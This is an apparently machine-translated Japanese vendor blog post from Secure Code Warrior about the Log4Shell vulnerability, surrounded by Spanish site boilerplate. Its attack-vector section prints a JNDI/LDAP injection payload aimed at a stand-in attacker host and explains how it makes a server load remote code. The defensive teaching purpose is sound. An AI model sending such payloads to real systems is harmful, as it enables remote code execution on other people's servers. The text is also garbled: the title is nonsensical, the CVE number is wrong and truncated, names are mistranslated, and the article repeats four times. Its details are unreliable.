Log4jの近親相-v788とその近く
12月9日、JavaライブラリLog4jのゼロデイエクスプロイトが公開されました。 CVE-4428、吹き替え ログ 4 シェル、このエクスプロイトによりリモートでコードが実行される可能性があるため、「重大度高」という評価を受けました(レース)。さらに、log4j-core は最も一般的な Java ロギングライブラリの 1 つであるため、何百万ものアプリケーションが危険にさらされます。
Log4Shellに取り組むスキルをすばやくレベルアップしたいですか?
Log4Shellの基本的な考え方から、Missionと呼ばれるシミュレーターでこの脆弱性の悪用を体験できるショーケースを構築しました。このミッションでは、Log4j の脆弱性がインフラストラクチャーやアプリケーションにどのように影響するかを順を追って説明します。 ショーケースに直接移動するには、ここをクリックしてくださいまたは、引き続き読み進めて脆弱性の詳細を確認してください。
古いニュース?
このエクスプロイトは新しいものではありません。セキュリティ研究者は 2016 年の BlackHat トークですでに発表しています。 アルバロ・ムニョスとオレクサンドル・ミロシュ それを強調しました。」アプリケーションでは、信頼できないデータを使用して JNDI ルックアップを実行すべきではありません」と、ターゲットを絞ったJNDI/LDAPインジェクションがどのようにリモートコード実行につながるかを説明しました。そして、これこそまさに Log4Shell の中核にあるものです。
攻撃ベクトル
Log4Shell のインジェクションペイロードは次のようになります。
$ {jndi: ldap: //attacker.host/xyz}
これを理解するには、Java の表現言語 (EL) について知る必要があります。次の構文で記述された式: $ {expr} 実行時に評価されます。たとえば、$ {java: version} は使用されている Java バージョンを返します。
次に、JNDI、または Java ネーミングとディレクトリインターフェイスは、LDAP、DNS、RMI などのプロトコルを使用してサービスに接続し、データまたはリソースを取得できるようにする API です。簡単に言うと、前述の悪意のあるペイロードの例では、JNDI は攻撃者が制御する LDAP サーバーを検索します。たとえば、その応答が悪意のあるコードを含む Java クラスファイルを指していて、そのコードが脆弱なサーバー上で実行されてしまう可能性があります。
この脆弱性が大きな問題となっているのは、Log4j がすべてのログエントリを評価し、「jndi」というプレフィックスが付いた EL 構文で記述されたすべてのログユーザー入力を検索するためです。ペイロードは、フォームフィールドなど、ユーザーがデータを入力できる場所ならどこにでも挿入できます。また、次のような HTTP ヘッダーもあります。 ユーザーエージェント そして X-Forwarded-For、およびその他のヘッダーは、ペイロードを伝送するようにカスタマイズできます。
このエクスプロイトを自分で体験するには、 ショーケースに進み、ステップ2「エクスペリエンス・インパクト」に飛び込んでください。
予防:意識
Log4jは脆弱なコードにパッチを当てているため、アップグレードはすべてのアプリケーションに推奨されます。ただし、バージョン 2.15.0 と 2.16.0 には DDoS やその他の脆弱性が含まれていたため、12 月下旬の時点で 2.17.0 へのアップグレードが推奨されています。
コードを書く開発者は、常にセキュリティを考慮する必要があります。Log4Shell は、サードパーティのフレームワークやライブラリを使用するときにはリスクが伴うことを教えてくれました。私たちは、単純に安全だと思い込んでいる外部ソースを使うことで、アプリケーションのセキュリティが危険にさらされる可能性があることを認識しておく必要があります。
この脆弱性を防ぐことはできましたか?はい、いいえ。一方で、開発者ができることは脆弱なコンポーネントがサードパーティのソフトウェアから導入されている場合に限られます。一方、このことから学んだ教訓は何度も繰り返されてきたものです。つまり、ユーザーの入力を決して信用しないということです。
Secure Code Warriorは、セキュリティ志向の開発者がコードの脆弱性を防ぐ最善の方法であると考えています。SCW はプログラミングフレームワークに特化したトレーニングを大規模に提供しているため、企業のお客様は、レポートデータを利用することで、影響を受けた Java 開発者を迅速に特定できるようになりました。また、Log4j のアップグレードを加速させるために、SCW のトレーニングを受けたセキュリティチャンピオンに頼っていました。
特にJava開発者のために、セキュア・コード・ウォリアーは無料のIntelliJプラグインであるSenseiを提供しています。このルールベースのコード分析ツールを使用すると、コーディングガイドラインを適用したり、脆弱性を防いだり修正したりできます。独自のルールを作成することも、既製のルールを使用することもできます。 クックブック。当社を閲覧してください レシピ、そして私たちのダウンロードを忘れないでください Log4j クックブック これにより、Log4Shellの脆弱性を瞬時に見つけて修正できます。
Log4Shell に対する防御のスキルをレベルアップさせましょう
このブログ投稿で学んだことを実践することに興味がありますか?私たちのショーケースが役に立ちます。ショーケースの開始時に、この脆弱性を簡単に確認した後、シミュレートされた環境に移動し、ガイド付きの指示に従ってエクスプロイトを試してみることができます。
Secure Code Warrior le ayuda a proteger el código a lo largo de todo el ciclo de vida del desarrollo de software y a crear una cultura que dé prioridad a la ciberseguridad. Tanto si es gestor de seguridad de aplicaciones, desarrollador, CISO o responsable de seguridad, le ayudamos a reducir los riesgos asociados al código inseguro.
Reservar una demostración
Laura Verheyde es desarrolladora de software en Secure Code Warrior y se dedica a investigar vulnerabilidades y crear contenido para Mission Lab y Coding Lab.
12月9日、JavaライブラリLog4jのゼロデイエクスプロイトが公開されました。 CVE-4428、吹き替え ログ 4 シェル、このエクスプロイトによりリモートでコードが実行される可能性があるため、「重大度高」という評価を受けました(レース)。さらに、log4j-core は最も一般的な Java ロギングライブラリの 1 つであるため、何百万ものアプリケーションが危険にさらされます。
Log4Shellに取り組むスキルをすばやくレベルアップしたいですか?
Log4Shellの基本的な考え方から、Missionと呼ばれるシミュレーターでこの脆弱性の悪用を体験できるショーケースを構築しました。このミッションでは、Log4j の脆弱性がインフラストラクチャーやアプリケーションにどのように影響するかを順を追って説明します。 ショーケースに直接移動するには、ここをクリックしてくださいまたは、引き続き読み進めて脆弱性の詳細を確認してください。
古いニュース?
このエクスプロイトは新しいものではありません。セキュリティ研究者は 2016 年の BlackHat トークですでに発表しています。 アルバロ・ムニョスとオレクサンドル・ミロシュ それを強調しました。」アプリケーションでは、信頼できないデータを使用して JNDI ルックアップを実行すべきではありません」と、ターゲットを絞ったJNDI/LDAPインジェクションがどのようにリモートコード実行につながるかを説明しました。そして、これこそまさに Log4Shell の中核にあるものです。
攻撃ベクトル
Log4Shell のインジェクションペイロードは次のようになります。
$ {jndi: ldap: //attacker.host/xyz}
これを理解するには、Java の表現言語 (EL) について知る必要があります。次の構文で記述された式: $ {expr} 実行時に評価されます。たとえば、$ {java: version} は使用されている Java バージョンを返します。
次に、JNDI、または Java ネーミングとディレクトリインターフェイスは、LDAP、DNS、RMI などのプロトコルを使用してサービスに接続し、データまたはリソースを取得できるようにする API です。簡単に言うと、前述の悪意のあるペイロードの例では、JNDI は攻撃者が制御する LDAP サーバーを検索します。たとえば、その応答が悪意のあるコードを含む Java クラスファイルを指していて、そのコードが脆弱なサーバー上で実行されてしまう可能性があります。
この脆弱性が大きな問題となっているのは、Log4j がすべてのログエントリを評価し、「jndi」というプレフィックスが付いた EL 構文で記述されたすべてのログユーザー入力を検索するためです。ペイロードは、フォームフィールドなど、ユーザーがデータを入力できる場所ならどこにでも挿入できます。また、次のような HTTP ヘッダーもあります。 ユーザーエージェント そして X-Forwarded-For、およびその他のヘッダーは、ペイロードを伝送するようにカスタマイズできます。
このエクスプロイトを自分で体験するには、 ショーケースに進み、ステップ2「エクスペリエンス・インパクト」に飛び込んでください。
予防:意識
Log4jは脆弱なコードにパッチを当てているため、アップグレードはすべてのアプリケーションに推奨されます。ただし、バージョン 2.15.0 と 2.16.0 には DDoS やその他の脆弱性が含まれていたため、12 月下旬の時点で 2.17.0 へのアップグレードが推奨されています。
コードを書く開発者は、常にセキュリティを考慮する必要があります。Log4Shell は、サードパーティのフレームワークやライブラリを使用するときにはリスクが伴うことを教えてくれました。私たちは、単純に安全だと思い込んでいる外部ソースを使うことで、アプリケーションのセキュリティが危険にさらされる可能性があることを認識しておく必要があります。
この脆弱性を防ぐことはできましたか?はい、いいえ。一方で、開発者ができることは脆弱なコンポーネントがサードパーティのソフトウェアから導入されている場合に限られます。一方、このことから学んだ教訓は何度も繰り返されてきたものです。つまり、ユーザーの入力を決して信用しないということです。
Secure Code Warriorは、セキュリティ志向の開発者がコードの脆弱性を防ぐ最善の方法であると考えています。SCW はプログラミングフレームワークに特化したトレーニングを大規模に提供しているため、企業のお客様は、レポートデータを利用することで、影響を受けた Java 開発者を迅速に特定できるようになりました。また、Log4j のアップグレードを加速させるために、SCW のトレーニングを受けたセキュリティチャンピオンに頼っていました。
特にJava開発者のために、セキュア・コード・ウォリアーは無料のIntelliJプラグインであるSenseiを提供しています。このルールベースのコード分析ツールを使用すると、コーディングガイドラインを適用したり、脆弱性を防いだり修正したりできます。独自のルールを作成することも、既製のルールを使用することもできます。 クックブック。当社を閲覧してください レシピ、そして私たちのダウンロードを忘れないでください Log4j クックブック これにより、Log4Shellの脆弱性を瞬時に見つけて修正できます。
Log4Shell に対する防御のスキルをレベルアップさせましょう
このブログ投稿で学んだことを実践することに興味がありますか?私たちのショーケースが役に立ちます。ショーケースの開始時に、この脆弱性を簡単に確認した後、シミュレートされた環境に移動し、ガイド付きの指示に従ってエクスプロイトを試してみることができます。
12月9日、JavaライブラリLog4jのゼロデイエクスプロイトが公開されました。 CVE-4428、吹き替え ログ 4 シェル、このエクスプロイトによりリモートでコードが実行される可能性があるため、「重大度高」という評価を受けました(レース)。さらに、log4j-core は最も一般的な Java ロギングライブラリの 1 つであるため、何百万ものアプリケーションが危険にさらされます。
Log4Shellに取り組むスキルをすばやくレベルアップしたいですか?
Log4Shellの基本的な考え方から、Missionと呼ばれるシミュレーターでこの脆弱性の悪用を体験できるショーケースを構築しました。このミッションでは、Log4j の脆弱性がインフラストラクチャーやアプリケーションにどのように影響するかを順を追って説明します。 ショーケースに直接移動するには、ここをクリックしてくださいまたは、引き続き読み進めて脆弱性の詳細を確認してください。
古いニュース?
このエクスプロイトは新しいものではありません。セキュリティ研究者は 2016 年の BlackHat トークですでに発表しています。 アルバロ・ムニョスとオレクサンドル・ミロシュ それを強調しました。」アプリケーションでは、信頼できないデータを使用して JNDI ルックアップを実行すべきではありません」と、ターゲットを絞ったJNDI/LDAPインジェクションがどのようにリモートコード実行につながるかを説明しました。そして、これこそまさに Log4Shell の中核にあるものです。
攻撃ベクトル
Log4Shell のインジェクションペイロードは次のようになります。
$ {jndi: ldap: //attacker.host/xyz}
これを理解するには、Java の表現言語 (EL) について知る必要があります。次の構文で記述された式: $ {expr} 実行時に評価されます。たとえば、$ {java: version} は使用されている Java バージョンを返します。
次に、JNDI、または Java ネーミングとディレクトリインターフェイスは、LDAP、DNS、RMI などのプロトコルを使用してサービスに接続し、データまたはリソースを取得できるようにする API です。簡単に言うと、前述の悪意のあるペイロードの例では、JNDI は攻撃者が制御する LDAP サーバーを検索します。たとえば、その応答が悪意のあるコードを含む Java クラスファイルを指していて、そのコードが脆弱なサーバー上で実行されてしまう可能性があります。
この脆弱性が大きな問題となっているのは、Log4j がすべてのログエントリを評価し、「jndi」というプレフィックスが付いた EL 構文で記述されたすべてのログユーザー入力を検索するためです。ペイロードは、フォームフィールドなど、ユーザーがデータを入力できる場所ならどこにでも挿入できます。また、次のような HTTP ヘッダーもあります。 ユーザーエージェント そして X-Forwarded-For、およびその他のヘッダーは、ペイロードを伝送するようにカスタマイズできます。
このエクスプロイトを自分で体験するには、 ショーケースに進み、ステップ2「エクスペリエンス・インパクト」に飛び込んでください。
予防:意識
Log4jは脆弱なコードにパッチを当てているため、アップグレードはすべてのアプリケーションに推奨されます。ただし、バージョン 2.15.0 と 2.16.0 には DDoS やその他の脆弱性が含まれていたため、12 月下旬の時点で 2.17.0 へのアップグレードが推奨されています。
コードを書く開発者は、常にセキュリティを考慮する必要があります。Log4Shell は、サードパーティのフレームワークやライブラリを使用するときにはリスクが伴うことを教えてくれました。私たちは、単純に安全だと思い込んでいる外部ソースを使うことで、アプリケーションのセキュリティが危険にさらされる可能性があることを認識しておく必要があります。
この脆弱性を防ぐことはできましたか?はい、いいえ。一方で、開発者ができることは脆弱なコンポーネントがサードパーティのソフトウェアから導入されている場合に限られます。一方、このことから学んだ教訓は何度も繰り返されてきたものです。つまり、ユーザーの入力を決して信用しないということです。
Secure Code Warriorは、セキュリティ志向の開発者がコードの脆弱性を防ぐ最善の方法であると考えています。SCW はプログラミングフレームワークに特化したトレーニングを大規模に提供しているため、企業のお客様は、レポートデータを利用することで、影響を受けた Java 開発者を迅速に特定できるようになりました。また、Log4j のアップグレードを加速させるために、SCW のトレーニングを受けたセキュリティチャンピオンに頼っていました。
特にJava開発者のために、セキュア・コード・ウォリアーは無料のIntelliJプラグインであるSenseiを提供しています。このルールベースのコード分析ツールを使用すると、コーディングガイドラインを適用したり、脆弱性を防いだり修正したりできます。独自のルールを作成することも、既製のルールを使用することもできます。 クックブック。当社を閲覧してください レシピ、そして私たちのダウンロードを忘れないでください Log4j クックブック これにより、Log4Shellの脆弱性を瞬時に見つけて修正できます。
Log4Shell に対する防御のスキルをレベルアップさせましょう
このブログ投稿で学んだことを実践することに興味がありますか?私たちのショーケースが役に立ちます。ショーケースの開始時に、この脆弱性を簡単に確認した後、シミュレートされた環境に移動し、ガイド付きの指示に従ってエクスプロイトを試してみることができます。
Haga clic en el siguiente enlace para descargar el PDF de este recurso.
Secure Code Warrior le ayuda a proteger el código a lo largo de todo el ciclo de vida del desarrollo de software y a crear una cultura que dé prioridad a la ciberseguridad. Tanto si es gestor de seguridad de aplicaciones, desarrollador, CISO o responsable de seguridad, le ayudamos a reducir los riesgos asociados al código inseguro.
Mostrar informeReservar una demostración
Laura Verheyde es desarrolladora de software en Secure Code Warrior y se dedica a investigar vulnerabilidades y crear contenido para Mission Lab y Coding Lab.
12月9日、JavaライブラリLog4jのゼロデイエクスプロイトが公開されました。 CVE-4428、吹き替え ログ 4 シェル、このエクスプロイトによりリモートでコードが実行される可能性があるため、「重大度高」という評価を受けました(レース)。さらに、log4j-core は最も一般的な Java ロギングライブラリの 1 つであるため、何百万ものアプリケーションが危険にさらされます。
Log4Shellに取り組むスキルをすばやくレベルアップしたいですか?
Log4Shellの基本的な考え方から、Missionと呼ばれるシミュレーターでこの脆弱性の悪用を体験できるショーケースを構築しました。このミッションでは、Log4j の脆弱性がインフラストラクチャーやアプリケーションにどのように影響するかを順を追って説明します。 ショーケースに直接移動するには、ここをクリックしてくださいまたは、引き続き読み進めて脆弱性の詳細を確認してください。
古いニュース?
このエクスプロイトは新しいものではありません。セキュリティ研究者は 2016 年の BlackHat トークですでに発表しています。 アルバロ・ムニョスとオレクサンドル・ミロシュ それを強調しました。」アプリケーションでは、信頼できないデータを使用して JNDI ルックアップを実行すべきではありません」と、ターゲットを絞ったJNDI/LDAPインジェクションがどのようにリモートコード実行につながるかを説明しました。そして、これこそまさに Log4Shell の中核にあるものです。
攻撃ベクトル
Log4Shell のインジェクションペイロードは次のようになります。
$ {jndi: ldap: //attacker.host/xyz}
これを理解するには、Java の表現言語 (EL) について知る必要があります。次の構文で記述された式: $ {expr} 実行時に評価されます。たとえば、$ {java: version} は使用されている Java バージョンを返します。
次に、JNDI、または Java ネーミングとディレクトリインターフェイスは、LDAP、DNS、RMI などのプロトコルを使用してサービスに接続し、データまたはリソースを取得できるようにする API です。簡単に言うと、前述の悪意のあるペイロードの例では、JNDI は攻撃者が制御する LDAP サーバーを検索します。たとえば、その応答が悪意のあるコードを含む Java クラスファイルを指していて、そのコードが脆弱なサーバー上で実行されてしまう可能性があります。
この脆弱性が大きな問題となっているのは、Log4j がすべてのログエントリを評価し、「jndi」というプレフィックスが付いた EL 構文で記述されたすべてのログユーザー入力を検索するためです。ペイロードは、フォームフィールドなど、ユーザーがデータを入力できる場所ならどこにでも挿入できます。また、次のような HTTP ヘッダーもあります。 ユーザーエージェント そして X-Forwarded-For、およびその他のヘッダーは、ペイロードを伝送するようにカスタマイズできます。
このエクスプロイトを自分で体験するには、 ショーケースに進み、ステップ2「エクスペリエンス・インパクト」に飛び込んでください。
予防:意識
Log4jは脆弱なコードにパッチを当てているため、アップグレードはすべてのアプリケーションに推奨されます。ただし、バージョン 2.15.0 と 2.16.0 には DDoS やその他の脆弱性が含まれていたため、12 月下旬の時点で 2.17.0 へのアップグレードが推奨されています。
コードを書く開発者は、常にセキュリティを考慮する必要があります。Log4Shell は、サードパーティのフレームワークやライブラリを使用するときにはリスクが伴うことを教えてくれました。私たちは、単純に安全だと思い込んでいる外部ソースを使うことで、アプリケーションのセキュリティが危険にさらされる可能性があることを認識しておく必要があります。
この脆弱性を防ぐことはできましたか?はい、いいえ。一方で、開発者ができることは脆弱なコンポーネントがサードパーティのソフトウェアから導入されている場合に限られます。一方、このことから学んだ教訓は何度も繰り返されてきたものです。つまり、ユーザーの入力を決して信用しないということです。
Secure Code Warriorは、セキュリティ志向の開発者がコードの脆弱性を防ぐ最善の方法であると考えています。SCW はプログラミングフレームワークに特化したトレーニングを大規模に提供しているため、企業のお客様は、レポートデータを利用することで、影響を受けた Java 開発者を迅速に特定できるようになりました。また、Log4j のアップグレードを加速させるために、SCW のトレーニングを受けたセキュリティチャンピオンに頼っていました。
特にJava開発者のために、セキュア・コード・ウォリアーは無料のIntelliJプラグインであるSenseiを提供しています。このルールベースのコード分析ツールを使用すると、コーディングガイドラインを適用したり、脆弱性を防いだり修正したりできます。独自のルールを作成することも、既製のルールを使用することもできます。 クックブック。当社を閲覧してください レシピ、そして私たちのダウンロードを忘れないでください Log4j クックブック これにより、Log4Shellの脆弱性を瞬時に見つけて修正できます。
Log4Shell に対する防御のスキルをレベルアップさせましょう
このブログ投稿で学んだことを実践することに興味がありますか?私たちのショーケースが役に立ちます。ショーケースの開始時に、この脆弱性を簡単に確認した後、シミュレートされた環境に移動し、ガイド付きの指示に従ってエクスプロイトを試してみることができます。
Índice
Secure Code Warrior le ayuda a proteger el código a lo largo de todo el ciclo de vida del desarrollo de software y a crear una cultura que dé prioridad a la ciberseguridad. Tanto si es gestor de seguridad de aplicaciones, desarrollador, CISO o responsable de seguridad, le ayudamos a reducir los riesgos asociados al código inseguro.
Reservar una demostración[Descargar]Recursos para empezar
Temas y contenidos de la formación en código seguro
Nuestro contenido, líder en el sector, evoluciona constantemente para adaptarse al entorno de desarrollo de software en constante cambio, teniendo siempre en cuenta las funciones de nuestros clientes. Abarca todo tipo de temas, desde la inteligencia artificial hasta la inyección de XQuery, y está diseñado para satisfacer las necesidades de diversos perfiles, desde arquitectos e ingenieros hasta gestores de productos y responsables de control de calidad. Echemos un vistazo al contenido que ofrece nuestro catálogo, clasificado por temas y funciones.
La Cámara de Comercio establece el estándar para la seguridad impulsada por desarrolladores a gran escala
Kamer van Koophandel comparte cómo ha integrado la codificación segura en el desarrollo diario mediante certificaciones basadas en roles, evaluaciones comparativas de Trust Score y una cultura de responsabilidad compartida en materia de seguridad.
%20(1).avif)
.avif)
Modelado de amenazas con IA: convertir a cada desarrollador en un modelador de amenazas
Saldrá mejor equipado para ayudar a los desarrolladores a combinar ideas y técnicas de modelado de amenazas con las herramientas de IA que ya utilizan para reforzar la seguridad, mejorar la colaboración y crear software más resistente desde el principio.
Recursos para empezar
Cybermon ha vuelto: la misión de IA para derrotar al jefe ya está disponible bajo demanda.
Ahora se puede jugar a «Cybermon 2025 Beat the Boss» en SCW durante todo el año. Introduzca retos de seguridad avanzados de IA/LLM y refuerce a gran escala el desarrollo seguro de la IA.
Explicación de la Ley de Resiliencia Cibernética: su significado para el desarrollo de software seguro desde el diseño
Descubra qué exige la Ley de Resiliencia Cibernética (CRA) de la UE, a quién se aplica y cómo puede prepararse el equipo de ingeniería para las prácticas de seguridad desde el diseño, la prevención de vulnerabilidades y el desarrollo de las capacidades de los desarrolladores.
Enable 1: Criterios de éxito predefinidos y medibles
Enabler 1 es la primera parte de la serie Enablers of Success, compuesta por diez partes, y presenta cómo madurar un programa a largo plazo vinculando la codificación segura con resultados empresariales como la reducción de riesgos y la velocidad.
